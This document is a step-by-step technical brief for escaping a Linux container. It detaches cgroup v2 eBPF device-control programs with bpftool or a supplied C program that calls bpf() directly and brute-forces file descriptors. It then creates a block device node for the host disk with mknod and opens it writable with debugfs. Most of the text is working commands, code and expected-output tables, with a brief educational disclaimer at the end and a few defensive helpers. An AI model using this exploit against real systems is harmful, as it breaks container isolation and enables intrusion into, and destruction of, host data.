This technical brief details the implementation of a Cgroup v2 eBPF device controller bypass. This method leverages the bpf() system call to detach the security programs governing device access.
First, locate the specific Cgroup v2 mount point for the current process. This is the filesystem target from which we will detach the eBPF programs.
# Locate the cgroup2 mount point
export CGROUP_V2_PATH=$(mount -t cgroup2 | awk '{print $3}')
# Identify the specific slice/ID for the current container
export MY_CGROUP=$(cat /proc/self/cgroup | cut -d/ -f3-)
export TARGET_PATH="$CGROUP_V2_PATH/$MY_CGROUP"
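The path derivation above can also be sketched in Python, which is easier to test against sample input than the shell pipeline. This is a minimal sketch and not part of the original tooling: the function name `cgroup_v2_path` and the default mount point `/sys/fs/cgroup` are assumptions, and the parser relies on the `0::/path` entry format that cgroups(7) documents for the unified hierarchy.

```python
def cgroup_v2_path(proc_cgroup_text, mount_point="/sys/fs/cgroup"):
    """Return the cgroup v2 directory for a process, or None if absent.

    proc_cgroup_text is the content of /proc/<pid>/cgroup. The v2 entry
    has hierarchy ID 0 and an empty controller list: "0::/some/path".
    mount_point is an assumed default; adjust it to the real mount.
    """
    for line in proc_cgroup_text.splitlines():
        parts = line.split(":", 2)
        if len(parts) != 3:
            continue  # skip blank or malformed lines
        hierarchy_id, controllers, path = parts
        if hierarchy_id == "0" and controllers == "":
            return mount_point.rstrip("/") + path
    return None


if __name__ == "__main__":
    with open("/proc/self/cgroup") as fh:
        print(cgroup_v2_path(fh.read()))
```

A return value of `None` means the process has no unified-hierarchy entry, in which case the rest of this brief does not apply.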
If bpftool is available, the bypass can be automated by iterating through all loaded eBPF programs and attempting a detach on the device hook.
# List all eBPF programs to find IDs
# Look for programs of type 'cgroup_device'
bpftool prog show
# Attempt to detach ALL programs from the target cgroup
# This mimics the 'blind detach' logic in the Go source
for PROG_ID in $(bpftool prog show | grep 'cgroup_device' | awk -F: '{print $1}'); do
bpftool cgroup detach "$TARGET_PATH" device id "$PROG_ID"
done
If bpftool is missing, the bypass requires a small C-wrapper or python script to invoke the bpf() syscall directly using the following parameters:
| Parameter | Value | Description |
|---|---|---|
| Command | BPF_PROG_DETACH (9) | The operation to perform. |
| Target FD | open(TARGET_PATH) | File descriptor of the cgroup directory. |
| Attach Type | BPF_CGROUP_DEVICE (6) | The specific controller we are bypassing. |
Once the programs are detached, the kernel will no longer block mknod. We target the host's physical disk (typically major 8).
# 1. Identify the host root partition major/minor
# Example: 8 1 (sda1)
cat /proc/partitions
# 2. Create the device node (this would fail before the detach)
mknod ./host_root b 8 1
# 3. Access the host filesystem
# Use debugfs to avoid the 'mount' syscall which might be blocked by other masks
debugfs -w ./host_root
- Required Privileges: The process must possess `CAP_SYS_ADMIN` or `CAP_BPF` to manipulate eBPF attachments.
- Kernel Version: Requires Linux 4.15+ (introduction of the cgroup device eBPF program type).
- Cgroup Version: Only applicable to Cgroup v2 (`unified` hierarchy).
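Whether a given workload meets the privilege requirement can be checked from its effective capability mask, which is useful when auditing containers for exposure to this technique. The following is a minimal sketch: the helper names (`parse_cap_eff`, `has_capability`, `report`) are hypothetical, while the bit positions (21 for `CAP_SYS_ADMIN`, 39 for `CAP_BPF`) come from `linux/capability.h`.

```python
CAP_SYS_ADMIN = 21  # bit index in linux/capability.h
CAP_BPF = 39        # bit index in linux/capability.h (Linux 5.8+)


def parse_cap_eff(status_text):
    """Extract the effective capability mask from /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split()[1], 16)
    raise ValueError("no CapEff line found")


def has_capability(mask, bit):
    """Return True if the given capability bit is set in the mask."""
    return bool((mask >> bit) & 1)


def report(status_text):
    """Summarize the two capabilities named in the requirements list."""
    mask = parse_cap_eff(status_text)
    return {
        "CAP_SYS_ADMIN": has_capability(mask, CAP_SYS_ADMIN),
        "CAP_BPF": has_capability(mask, CAP_BPF),
    }


if __name__ == "__main__":
    with open("/proc/self/status") as fh:
        print(report(fh.read()))
```

If both values are `False`, the process lacks the privileges listed above; dropping these capabilities from container specifications is the most direct mitigation.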
| Action | Expected Result (Success) | Expected Result (Fail) |
|---|---|---|
| bpftool cgroup detach | Return code 0 | Operation not permitted |
| mknod ... b 8 1 | File created | Operation not permitted |
| debugfs | Access to ls / on host | Bad magic number / Permission denied |
The following minimal C program implements the same detach step for environments where bpftool is unavailable.
It issues the BPF_PROG_DETACH command through the bpf() system call, which is the programmatic equivalent of the Go code's core logic.
#include <linux/bpf.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
int main(int argc, char *argv[]) {
if (argc < 3) {
printf("Usage: %s <cgroup_path> <bpf_prog_fd>\n", argv[0]);
return 1;
}
int cg_fd = open(argv[1], O_RDONLY);
int bpf_fd = atoi(argv[2]);
union bpf_attr attr = {
.target_fd = cg_fd,
.attach_bpf_fd = bpf_fd,
.attach_type = BPF_CGROUP_DEVICE
};
if (syscall(SYS_bpf, BPF_PROG_DETACH, &attr, sizeof(attr)) == 0) {
printf("Success: Detached FD %d from %s\n", bpf_fd, argv[1]);
} else {
perror("Bypass failed");
}
close(cg_fd);
return 0;
}
A. Compile the bypass tool:
gcc bypass.c -o bypass
B. Find the container's Cgroup path:
export CG_PATH="/sys/fs/cgroup$(cat /proc/self/cgroup | cut -d: -f3)"
C. Brute-force detach:
Since we cannot easily list BPF FDs without bpftool, we attempt to detach all likely File Descriptors (standard BPF FDs start from 3 onwards).
for fd in {3..20}; do
./bypass "$CG_PATH" $fd
done
D. Create the Host Device Node:
Once the eBPF filter is detached, the device controller no longer blocks mknod.
# Create node for /dev/sda1 (Major 8, Minor 1)
mknod ./host_disk b 8 1
# Access host files directly
debugfs -w ./host_disk
For Educational and Authorized Security Testing Only.
This information is intended for security researchers and system administrators to understand and mitigate container escape vectors. Accessing or modifying systems without explicit authorization is illegal. The techniques described involve low-level kernel interactions that can cause system instability or data loss. Use at your own risk.